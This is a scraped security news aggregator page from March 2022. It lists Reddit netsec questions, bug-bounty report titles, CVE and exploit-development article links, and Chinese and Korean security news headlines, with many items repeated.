    Bit of a different post here than usual. Ive been a pentester for 3 years now with the same company. Management is poor and there are many hours spent off the clock being used to catch up on writing reports that couldnt be done in time due to overlapping client work. We are busy (which is "a good thing" as they say), but our team has been grinding pretty much non stop for 2 years. High utilization rates (usually pushing 100%) keep us all booked with little to no wiggle room to pursue career development related items like new certs/training unless its done on whats left of our free time. I likely should've left earlier, but I needed the job for stability. I feel more stable financially but not mentally, so I think it may be time to move on. Its hard to decide if Im just burned out from pentesting as a whole or if I would thrive in a better managed environment. Either way, Im leaning towards internal blue team related jobs as it seems to be the best way to transition my skills. My biggest struggle is dealing with too many clients in a short timespan, and having work follow me after hours. I don't know what job in this line of work can eliminate those two things, but I am on the hunt and would love suggestions! TLDR: What are jobs that pentesters can transition into after getting burnt out? I am thinking about internal blue team related positions, but open to any other suggestions. Please feel free to share any similar experiences as well. submitted by /u/UniversitySquirrel [link] [comments]
    Approach to selecting a new pen test vendor. What should I look for/ask?
    Hi all, I work for a financial company that has about 400 employees. I am not an expert on net sec but know some basics. I have been with the company for about two years and am somewhat familiar with our environment. My boss asked me to look into a new pen test vendor and since I have no experience with this sort of thing I was wondering how I should be approaching this. Seems like the last guy who did this is no longer around for guidance. Any help is appreciated. Thank you submitted by /u/Throwawayboi91 [link] [comments]
    web hacking automation
    I have a Dev background and I'm quite familiar with web hacking. Seeing these top hackers automating a ton, one question arise in mind, "What bugs are practically automatable". Everyone is automating subdomain takeovers it's easy to automate but what about Xss or SQLi? Are they automating those only checking URL parameters? submitted by /u/crusader2409 [link] [comments]
    How safe is js source obfuscation?
    I don't have much background in security, I am planning to make a small game for an event. Imagine like a flappy bird except that u will get real prize in form of gift card after finishing the game. To prevent players from cheating, I will obfuscate the js source but how safe is this approach? is it easy to bypass? And how much will js obfuscation impacts performance? submitted by /u/Chillseashells [link] [comments]
    Active Directory protocols
    Hi! ​ I am reading on AD network security. Currently, I find only network-related security issues regarding NTLM and Kerberos. Are there not other protocols and correlating attacks that is out there? I would love references to papers or blogs. submitted by /u/DiiBBz [link] [comments]
    Internal Websites / Web GUIs Best Practices
    I have taken over a 15 segment switch network that has been neglected in the use of best practices for many years. I have migrated from telnet to SSH, local logins to RADIUS, SNMPv3 and so on. This issue I am having is my coworkers and I are having difference of opinion on certain things. The last issue I had was the best practices in regards to SNMPv3. https://www.reddit.com/r/AskNetsec/comments/taa6ny/snmpv3_password_best_practice/?utm_source=share&utm_medium=web2x&context=3 The advice I got here was helpful for us to come to an understanding on the proper course of action. I would like to ask for more help. We have several internal websites / web GUIs , Cisco Firepower, Cisco Prime, SolarWinds , Cisco Wireless controllers and etc. These site are all internal with no Public facing addresses and just private addressing 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16. I say that we should have a URL and install a web certificate in order to have HTTPS for the traffic to be encrypted. I am getting push back from my coworkers that this is overkill since we don't allow access to these systems. I am thinking that this could be an attack vector since a malicious software could be installed on our network collecting such information and then when they have enough its game over for us. If anyone could direct me to some good information on this topic or take a moment of their time to explain it here? - Thank you in advance submitted by /u/NetworkRex [link] [comments]
    Question about HaveIBeenPwned hash lists file size
    Hello, On the website I see two options to download, one of them is ordered by prevalence and one is ordered by hash. Any idea why the ordered by prevalence is much much larger? 17.2 GB vs 11.1 GB https://haveibeenpwned.com/Passwords submitted by /u/itismo [link] [comments]
    Port forwarding VPN server dangerous?
    I want to host my own VPN server. The server in question is pretty discardable a.k.a. if it breaks, I don't really care, so I am planning to port forward it to the internet. The question is: port forwarding SoftEther VPN safe or not? It depends certainly on the port that is open, but in general, how well do VPN servers like softether hold up against worms and trojans and mass-malware? Will it spread to my other devices (which are more valuble than the server)? Is there such thing as network-level port-forwarding malware? I literally tested port forwarding for a minute on a VM device and I got logs from all over the world with 100s of different IP. It is a scary place out there and I want to make sure the port of entry is hardened and secure against these "meteors". submitted by /u/bootsareme [link] [comments]
    Question about Sensitive PII and Non-Sensitive PII
    Every day millions of websites capture information like Name, Address, and Email Addresses for registration on their websites. Is this information considered PII and are they legally obligated to treat it as such? For example, even Facebook captures my name and email address, would this be considered PII? Could someone explain where the line is essentially drawn between what is PII and what is not? Take a CMS like WordPress. WordPress has third-party tools like WooCommerce which capture Name, Physical Address, etc. So, because WooCommerce is capturing this data and it resides on the host installation of WordPress is this considered PII? Which is the point of my question, would million of websites be in violation and could potentially be sued? What would be considered 'reasonable protection'? -FC submitted by /u/FutureCombinations [link] [comments]
  • Open

    Sneaky F*ing Russians: Tracking Sanctioned Super-Yachts
    Last week, Benjamin Strick Tweeted a little piece of satellite imagery from Planet. The imagery was less than a day old, and showed what… Continue reading on Medium »
    Ukraine — Point de situation au 17 mars
    Les dernières 24h Continue reading on Medium »
    What is Open Source Intelligence (OSINT)?
    Open source intelligence is a term originally coined by intelligence services. OSINT uses freely available, open sources such as print… Continue reading on Medium »
    JupyterLab for Python
    Installation Continue reading on Medium »
  • Open

    windows stuff (+ spongebob favicon)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Exploit Development: Browser Exploitation on Windows – CVE-2019-0567 (Part 1)
    Article URL: https://connormcgarr.github.io/type-confusion-part-1/ Comments URL: https://news.ycombinator.com/item?id=30702130 Points: 1 # Comments: 1
    Veeam Backup and Replication Distribution Service CVE-2022-26500, CVE-2022-26501
    Article URL: https://www.veeam.com/kb4288 Comments URL: https://news.ycombinator.com/item?id=30696265 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-16 Review
    [HTB] TheNotebook Writeup by 0x584a ICD(集成网络防御)概念参考模型 by ourren 企业安全运营实践:四个阶段实现风险处置的快和准 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-16 Review
    [HTB] TheNotebook Writeup by 0x584a ICD(集成网络防御)概念参考模型 by ourren 企业安全运营实践:四个阶段实现风险处置的快和准 by ourren 更多最新文章,请访问SecWiki
  • Open

    0-day Cross Origin Request Forgery vulnerability in Grafana 8.x .
    Aiven Ltd disclosed a bug submitted by abrahack: https://hackerone.com/reports/1458236 - Bounty: $1500
    Stored XSS through PDF viewer
    Slack disclosed a bug submitted by hitman_47: https://hackerone.com/reports/881557 - Bounty: $4875
    Open redirect GET-Based on https://www.flickr.com/browser/upgrade/?continue=
    Flickr disclosed a bug submitted by c4rrilat0rr: https://hackerone.com/reports/1217570 - Bounty: $150
  • Open

    [Autopsy] Sample images to learn / practice
    Hi, I am trying to learn autopsy and I am having hard time to find any disk images or data sources that I can use to practice and learn certain aspects/features of autopsy. Can anyone suggest somewhere I can download such samples with/without instructions? submitted by /u/madladmary [link] [comments]
    Lost Mode iPhone BFU?
    submitted by /u/investigator0101 [link] [comments]
    Exploring Career Transition Options
    I am currently exploring possible career options in the private sector and was hoping to get some input. The career I am interested in would be a remote position and hopefully near the six figure mark. For the past 8 years I have been in law enforcement as a forensic examiner for an ICAC task force. I have a BS in computer information systems and current certifications include A+, CFCE, ICMDE, CCME, and MCFE. I would like to continue doing something I find meaningful and am looking further into Threat Investigator positions for Meta, though I have yet to determine if this is a good fit. Does anyone have advice or opinions on what other positions may exist and what additional steps I may need to take to better prepare for such a future transition? submitted by /u/outdorksman [link] [comments]
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    HackTheBox — Devzat
    No content preview
    Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    No content preview
    How to write simple script to automate finding bugs
    No content preview
    OTP Bypass and Account Takeover at Rajagiri Hospital
    No content preview
    SQL Injection at Spotify
    No content preview
  • Open

    联邦调查局警告称国家黑客正利用MFA漏洞进行横向移动
    美国联邦调查局表示,俄罗斯政府支持的黑客组织正积极利用错误配置的默认多因素认证(MFA)协议从而进入一些非政府组织的云端。
    FreeBuf早报 | 美国帮助乌克兰加强网络战防御;德国建议公民卸载卡巴斯基杀毒软件
    网络安全、数字安全是托起数字经济的底层逻辑,不能建立在侵害消费者知情权与选择权的基础上。
    俄乌冲突导致关键信息基础设施面临风险
    No content preview
    调查发现,近来Google Play已被多款恶意应用渗透
    追踪移动应用生态系统的安全研究人员注意到,最近Google Play 商店的木马渗透率激增,其中一款应用的下载安装量超过了50万次。
    德国BSI机构建议更换卡巴斯基杀毒软件
    BSI建议用户卸载卡巴斯基反病毒软件,因为他们发现这家网络安全公司可能与俄罗斯持续入侵乌克兰期间的黑客攻击有关
    3·15 | 智能音箱安全吗,中国评测来帮您!
    中国软件评测中心选取了市面畅销的多台有屏智能音箱和无屏智能音箱,从网络安全、数据安全和个人信息安全等多个角度进行测评。
    俄罗斯面临 IT 危机,数据存储空间还剩2月用完
    在数据库巨头Oracle(甲骨文)、企业服务提供商SAP等云服务商撤出俄罗斯后,俄罗斯面临严峻的IT存储危机。
    3.15首设安全实验室应对信息安全:网安再成“社会性话题”
    在2022年3·15晚会上,网络安全问题依旧是重头戏,本届315晚会首设信息安全实验室,直观展示不安全。
  • Open

    GitHub won’t restore HTTPie followers despite vulnerability, no notifications
    Article URL: https://twitter.com/httpie/status/1503862290822664198 Comments URL: https://news.ycombinator.com/item?id=30696255 Points: 7 # Comments: 1
  • Open

    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...
    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...
  • Open

    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...
    关于乌克兰网络攻击的网络研讨会 -- 摘要和问答
    译者:知道创宇404实验室翻译组 原文链接:https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ 关于网络研讨会 2022年3月10日,卡巴斯基的全球研究和分析小组(GReAT)分享了他们对乌克兰当前(和过往)网络攻击的见解。在这篇文章中,我们解决了我们没有时间回答的问题,并提供了能...

  • Open

    Bye👋🏼 XSS Auditor (X-XSS-Protection)
    이번 Webkit(Safari 15.4) 업데이트에는 중요한 보안 정책 변경이 있었습니다. X-XSS-Protection으로 잘 알려진 XSS Auditor가 제거됩니다. XSS Auditor는 Refelcted XSS를 완화하기 위한 디자인이자 보안 정책으로 HTML Parsing 단계에서 웹 요청이 response에 어떻게 반응하는지 체크하고, XSS의 가능성이 있으면 차단하는 기능입니다. 개발자가 이를 Response 내 X-XSS-Protection 헤더를 통해 컨트롤할 수 있도록 제공되고 있습니다. 이는 WebKit의 CSP(Content-Security-Policy) 지원 범위가 Level3에 도달하여 CSP로도 충분히 대응이 가능하기 때문이라고 판단되어 제거된다고 하네요. Chrome의 경우 Chrome 78 버전(2019년 8월쯤), Firefox 또한 예전에 종료되었던 상태라 이제 메이저 3사 브라우저에선 모두 지원하지 않는 기능, 헤더가 되었습니다.
    HAR(HTTP Archive format) 포맷과 앞으로의 개발 계획
    오늘은 뭔가 기술적인 이야기보단, 그냥 제가 최근에 급 관심이 생긴 HAR 포맷에 대해 이야기할까 합니다. HAR HAR(HTTP Archive format)는 웹 브라우저과 웹 사이트의 interaction을 로깅하기 위한 목적으로 만들어진 JSON 기반의 포맷입니다. 이는 브라우저와 웹 서비스에서의 성능 측정 정보를 내보내기 위한 목적으로 만들어졌고 Chrome, Firefox, Postman 등 메이저 도구들에서 지원하고 있습니다. Charles Proxy Fiddler Firebug Firefox Google Chrome IE Microsoft Edge Postman OWASP ZAP Etc.. 왜 관심가지나요? HAR의 존재는 오래되기도 했고 저도 분석할 때 브라우저의 개발자 도구에서 많이 봤던 상태라 알고는 있었습니다.
  • Open

    how do you train yourself?
    What are you doing about improving yourself/finding an entry-level job in cybersecurity? What is your routine about it? submitted by /u/ogunal00 [link] [comments]
    GDSA or CCNP Security
    Hey guys, So I do GRC as a living. I skipped from helpdesk into GRC consulting, but I'm interested in gaining technical knowledge in cybersecurity so that I could move to a security engineer/security analyst type role in the event I get tired of the work (which I can see happening atm). Something that should also be mentioned is that my job offers flexibility to be put on engagements that fit a topic you're interested in, though I have heard we don't have as many clients asking for help with implementation. I'm an associate of ISC(2) for the CISSP, have a couple comptia certs, the Azure Administrator, and the CCNA that I grabbed a couple years ago under the "new" exam structure. My company pays for certs, so price is not really an issue. I am interested in whether the GIAC GDSA or the CCNP Security is a more valuable investment. There's not too much information on the GDSA that I can find, and through my research, I have found people recommending to do the CCNP R&S before going to CCNP Security back when it was under a different format. I'm not interested in getting the CCNP Sec if it requires for me to get the CCNP Ent first. I don't really want to be a network engineer nor spend my time learning more advanced networking when I don't see myself using it. The curriculum in the CCNP Sec though seems more up my alley. Another option is to go for my CISM or CISA, but I don't want to focus more on the governance/management side of things when I severely lack practical implementation experience. It is another option on the table though. Thoughts? submitted by /u/DiscombobulatedEar88 [link] [comments]
    Nikto use vulnerabilities found!
    Hey guys so i had this asp.net application i created for testing security (i am completely new to this field) so while looking for some tutorials i found this cool tool named Nikto which scans servers for vulnerabilities and when i was running my asp.net app and testing it i got this line in the scan results saying : OSVDB-3092: /web.config: ASP config file is accessible. how can i access the web.config file that Nikto says is accessible ? submitted by /u/darkuniv [link] [comments]
    Is there any way to currently circumvent China’s GFW?
    Was reading a couple articles written in last 12 months and I get the sense that most OpenVPN services are detected and blocked, as well as UDP (WireGuard). Is there any alternative that currently works besides direct satellite options? submitted by /u/DryBloomer [link] [comments]
  • Open

    OpenSSL CVE-2022-0778: Infinite loop in BN_mod_sqrt() reachable when parsing certificates
    submitted by /u/yawkat [link] [comments]
    NSA, CISA Release Updated Kubernetes Hardening Guidance
    submitted by /u/sanitybit [link] [comments]
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Bounty Hacker Tryhackme
    No content preview
    How I bypassed disable_functions in php to get a remote shell
    No content preview
  • Open

    Coding C2 Bind Shell Channel with C# and Powershell
    https://www.youtube.com/watch?v=9CX7muqkjtQ submitted by /u/luzunov [link] [comments]
    Automating a Red Team Lab: Logging and Monitoring
    submitted by /u/nickonos [link] [comments]
  • Open

    International Women’s Day + Anti-War Protests + Ongoing “Freedom” convoys + More
    On this 4th edition of the discursus Protest Analytics newsletter — March 15, 2022 Continue reading on discursus.io »
    Don’t be a troll
    Around a year ago, I ended up in a Messenger conversation to assist a friend who had started a new business and had the surprise of… Continue reading on Medium »
  • Open

    SecWiki News 2022-03-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Node.js security: Parse Server remote code execution vulnerability resolved
    Article URL: https://portswigger.net/daily-swig/node-js-security-parse-server-remote-code-execution-vulnerability-resolved Comments URL: https://news.ycombinator.com/item?id=30686373 Points: 1 # Comments: 0
  • Open

    Cr8escape: Zero-day in CRI-O Container Engine (CVE-2022-0811)
    Article URL: https://www.crowdstrike.com/blog/cr8escape-zero-day-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/ Comments URL: https://news.ycombinator.com/item?id=30686358 Points: 3 # Comments: 0
  • Open

    2月以来,欧洲移动恶意软件激增 500%
    2022 年 2 月以来,研究人员发现欧洲的移动恶意软件传播增加了 500%。
    【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁
    从西方APT组织的攻击历史及已经泄露的网络武器看,高隐匿、高持久化(Low&amp;Slow)是其关键特征,而 Rootkit 则是达成此目的的重要技术之一。
    乌克兰在冲突中使用了Clearview AI的面部识别技术
    近日,乌克兰国防部宣布将Clearview公司提供的人工智能面部识别技术运营到战场。
    黑客入侵俄罗斯能源巨头位于德国的子公司,窃取了20TB数据
    黑客表示,俄罗斯对乌克兰的入侵是导致攻击的根本原因。
    赶紧打开手机看看,这14款APP被工信部点名
    工信部开展App侵害用户权益整治“回头看”行动,组织第三方检测机构对APP进行重点检测,共发现14款App存在问题。
    FreeBuf早报 | 大规模DDoS攻击袭击以色列;汽车巨头DENSO遭勒索攻击
    有关育碧遭到网络攻击的谣言在网上流传,而数据勒索组织LAPSUS$则表明这并不是留言,他们已经入侵了育碧。
    俄乌网络战时间线全回顾及对抗特点研究梳理
    乌克兰与俄罗斯之间爆发全面军事战争,网络成为了真实的战场空间。
    以色列遭大规模DDoS攻击,导致其政府网站下线
    据以色列媒体报道称,大规模的DDoS攻击致使许多以色列政府网站被迫关闭
  • Open

    How Chrome Became Highest Scoring Browser on Speedometer, Ever
    Last week we released a blog post about our improvements in Chrome speed over the past year culminating with the M99 release of Chrome. We wanted to follow up by going in depth on how we achieved this milestone in browser performance. Since the launch of Chrome in 2008, one of our core principles has been to build the fastest browser, whether you're on your phone or laptop. We have never strayed from our performance mission, and are always analyzing and optimizing every part of Chrome. We're proud to announce that Chrome scores over 300 on Apple’s Speedometer 2.0 benchmark suite on the M1 MacBook, the highest score we’ve ever seen. In this The Fast and the Curious post we'll go behind the scenes to share all the work that went into making Chrome blazingly fast. “If you can’t measure it y…
  • Open

    Los 3 Chiflados
    http://37.187.20.239/Los%203%20Chiflados/ submitted by /u/inoculatemedia [link] [comments]
    huge collection of flash games (nsfw) just in case
    submitted by /u/millhouse187 [link] [comments]
  • Open

    The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation
    submitted by /u/AttitudeAdjuster [link] [comments]
  • Open

    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
  • Open

    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    v8 漏洞在 windows 微信下利用的研究
    作者:lxraa@识链实验室 前言 由于无法绕过沙箱,该漏洞已被忽略。 谷歌在V8相关漏洞修复一段时间后,会公布(https://bugs.chromium.org/)漏洞的poc,有些漏洞有exp。但是公布的exp一般是存在漏洞的最后一个版本,由于不同版本V8的数据结构有变化,造成堆布局不同,公布的exp在非实验环境往往不能直接使用,本文以最新版微信远程命令执行为例介绍了从exp到实...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
    俄罗斯新雨刷恶意软件: 深入研究 RURansom 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/ 在定期的 OSINT 研究中,Cyble 研究实验室偶然发现了 MalwareHunter 团队的一个 twitter 帖子,强调了一个名为 RU...
  • Open

    Bug Bounty on Marsbase
    Right after the release of the dOTC of the Marsbase platform, we are launching a Bug Bounty program to find bugs. This program provides… Continue reading on Medium »

  • Open

    Burnout and me
    Please avoid it because it is preventable. Continue reading on Medium »
    Баг Баунти миссия на Marsbase dOTC
    В связи с релизом dOTC платформы Marsbase мы запускаем программу Bug Bounty по поиску багов. Данная программа предусматривает, что… Continue reading on Medium »
    Achieving Remote Code Execution via Unrestricted File Upload
    $whoami: Continue reading on Medium »
    SQL Injection at Spotify
    SQL Injection at Spotify. Continue reading on Medium »
    Story about more than 3.5 million PII leakage in Yahoo!!!
    Hello GUYS, Continue reading on Medium »
    How I Made The BBC Hall Of Fame 3 Times
    Happy Monday to anyone reading this write up. Today I am going to describe how I was able to make the BBC Hall Of Fame 3 times. My… Continue reading on Medium »
    My Pentest Log -10- (A Little Tip)
    Greetings to all from Khrysokeras, Continue reading on Medium »
    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    A simple story when Allah allowed me to get P1 by combining several issues, one of which was related to “weak credentials”. Continue reading on InfoSec Write-ups »
    How I access other domains in infinityfree.net using Directory Traversal
    Hi, it’s me again haha Kurt Russelle Marmol aka xkurtph, Web Developer (noobie) and Security Researcher. Continue reading on Medium »
  • Open

    registering with the same email address multiple times leads to account takeover
    Reddit disclosed a bug submitted by whitehacker18: https://hackerone.com/reports/785833
    User files is disclosed when someone called while the screen is locked
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1338781 - Bounty: $350
    Specially crafted message request crashes the webapp for users who view the message
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1253732 - Bounty: $150
  • Open

    Can an HTTPS Website be Hacked?
    It should be no shock by now that a professional can break through anything. These days, zero-days are a dime a dozen, so it’s important to ensure your site is hardened and protected as much as possible. While an SSL certificate can certainly be an important factor, it’s only one slice of the pie. In this article, we’ll be elaborating on the myths of SSL, the kinds of hacks that still have the potential to occur, and how you can improve an HTTPS site beyond installing an SSL certificate.  Continue reading Can an HTTPS Website be Hacked? at Sucuri Blog.
  • Open

    Wanting to be Pentester
    Just finished High school and am wanting to be a Pentester.Got inspired by Mr.Robot Really. Got little knowledge of Python and C , what are the ways to learn more and what to take in college for it. submitted by /u/Small_Run9123 [link] [comments]
    is it too late for me to become a pentesfer
    Hello. I'm about to graduate college. I have some decent programming experience but no security experience. I can't do the most basic CTFs. If I get OSCP and some other certs will that be enough to do a Jr pentesting job? Will that enable me to do some CTFs? I feel like I should have started when I was like 13. Is it too late for me? submitted by /u/Hellothere6667 [link] [comments]
    General advice needed for dealing with IPS alerts
    We have set up IPS monitoring on our firewall and I've been taking a look through the IPS events. Some are obvious on how to deal with, but some are harder, and I wondered if I could get some insight on what the process you guys would follow is for these? For example, one of our laptops on the remote VPN is triggering a IPS alert - 'TCP Segment Overwrite' I google the text and I see that "This signature fires when one or more TCP segments in the same stream overwrite data from one or more segments located earlier in the stream. This may indicate an attempt to hide an attack." and also "Overwriting TCP segments does not normally occur and should be treated with suspicion" OK, sounds suspicious? So I run an AV scan, and the machine comes up clean. So where would I go from here? Disclaimer, I'm no "Mr Robot" lol. I can understand TCPdump in terms of tracing where a packet is going and which interface it goes in / out etc but when it comes down to analysing packet contents etc with Wireshark, well..my abilities just don't stretch that far :( I always seem to hit this brick wall with a lot of IPS alerts where I'm just sat thinking, I don't know exactly what's causing it so I can't say it's a false positive or not. It's very frustrating! :/ Thanks for any advice you can give! submitted by /u/EffectiveClock [link] [comments]
    FOSS App Whitelisting Suggestions for Win 10 Home
    I'm running Windows 10 Home on a personal computer and am seeking a FOSS-alternative to AppLocker (AppLocker can only be managed on Windows 10 Enterprise, Education, etc.). Does anyone have any suggestions? submitted by /u/cyberphor [link] [comments]
    How to clean a infected USB
    Hi everyone, Let's say I have a USB and I'm sure there is some kind of virus in it. What is the best way to clean and secure it so I can use it on my further days? submitted by /u/emir0723 [link] [comments]
    I'm losing hope
    In October I realized I hated my job and I've decided to learn IT because I've always wanted to work in that field. I did CS50 to the end and I loved it. Since I couldn't decide in what domain of IT I wanted to pursue my learning path (because everything interests me in IT), I went into cyber security since it's pretty much the IT domain that includes all the IT domains. I did TryHackMe's Pre Security path and now I'm almost done with the Jr Pentester path. I'm planning to do the Blue Team path. I also do CTFs to practice along. At this point I suppose that if this field was not for me I would've known by now, but so far I love it. I want to become a Blue Teamer Now I'm reading here and there on Reddit that it's impossible to start in cybersec for a beginner because you need real IT experience for instance years as a software/network engineer. Back when I started learning, people told me that I just needed Lab practice and Certifications and then boom I could apply for entry level jobs in cybersec. I wanted to get my foot in the door by starting as a Help Desk and then as a Sys Admin, mastering the fundamentals is obviously mandatory so I know I can't just start as a Blue Team Expert, but do I really need to be a network engineer for multiple years to then have enough XP to enter cybersec's (cybersex) field ? Thank you for guiding me ​ TLDR: Is it mandatory to be an ex software/network engineer to then work in cyber security ? submitted by /u/No-Lead497 [link] [comments]
    Converting .nessus files to CSV
    Hello AskNetsec, I have been performing CIS Benchmark scans and I am trying to find a good method for keeping track of audits while trying to remediate them. This is both for myself, our engineers and management. I have been struggling trying to find the right format to do this. I would like to convert .nessus files into CSV, I hope that will do the trick. Does anyone know a good method of converting from .nessus to CSV? If you have any other recommendations as to how to streamline this process you are most welcome to comment it. Thank you in advance! submitted by /u/Gabbana2 [link] [comments]
    about which cert should I pick
    my uni is providing few certs under institutional training. the certs are. CompTIA A+ CompTIA Linux+ CompTIA Network+ CompTIA Server+ CompTIA Security+ VMWare Virtualization and Software Defined Network Concepts. Palo Alto Cloud Security Fundamentals. Palo Alto Security Operations Fundamentals. my goal is to become penetration tester and I an currently first year student. I had plans to get security+ in 3rd year but since our uni has partnered I am confused which of these certs is best for me so that these help me in placement drive and so that I can focus on studying for oscp from 2nd year. so basically which cert should I choose. I am very grateful for your help!! submitted by /u/Otaku531 [link] [comments]
    Could Russia create a true “splinternet”?
    Guess one model would be North Korea, but something tells me that Russia would have harder time based on geography and the population’s current usage of the internet. submitted by /u/DryBloomer [link] [comments]
  • Open

    AWS/GitLab Self-Hosted CTF
    submitted by /u/RedTermSession [link] [comments]
    Shodan: Introducing the InternetDB API
    submitted by /u/D4r1 [link] [comments]
    Making Sense Of The Dirty Pipe Vulnerability (CVE-2022-0847) - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]
    FirmWire is a full-system baseband firmware emulation platform
    submitted by /u/domenukk [link] [comments]
  • Open

    A Detailed Guide on httpx
    Introduction httpx is a fast web application reconnaissance tool coded in go by www.projectidscovery.io. With a plethora of multiple modules effective in manipulating HTTP requests The post A Detailed Guide on httpx appeared first on Hacking Articles.
  • Open

    A Detailed Guide on httpx
    Introduction httpx is a fast web application reconnaissance tool coded in go by www.projectidscovery.io. With a plethora of multiple modules effective in manipulating HTTP requests The post A Detailed Guide on httpx appeared first on Hacking Articles.
  • Open

    How Important is The Red Team in Cyber Security?
    A red team plays a crucial role in cyber security as they pose as “ethical hackers.” Continue reading on Medium »
    TRY HACK ME: Intro to C2 Write-Up
    Task 1 Introduction - Continue reading on Medium »
  • Open

    Tonight at Midnight Presenting…
    If you pre-ordered, you know where I am going with this! Continue reading on Medium »
    SXSW 2022: Ti West’s X: Horror, Executed
    X is, indeed, gonna give it to ya Continue reading on Cinapse »
  • Open

    小白谈数据安全2
    浅谈数据安全制度体系。
    FreeBuf早报 | 匿名者号召俄罗斯人“消灭普京”;因网络攻击海贼王停播
    近日,Anonymous 向俄罗斯公民发布了一条新信息,邀请他们一起“消灭”正在牺牲他们并杀害乌克兰人的总统普京。
    HIPAA合规SSL数字证书是什么?
    随着数字化的广泛应用,SSL数字证书已成为网络不可或缺的一部分,保护敏感数据通信和用户隐私比以往任何时候都更加重要
    《未成年人网络保护条例(征求意见稿)》再次公开征求意见
    《条例》共七章六十七条,指出家庭、学校和其他教育机构应当教育引导未成年人参加有益身心健康的活动,预防和干预未成年人沉迷网络。
    网站只有一个登录框怎么办?———用户名密码重置的6种绕过情况
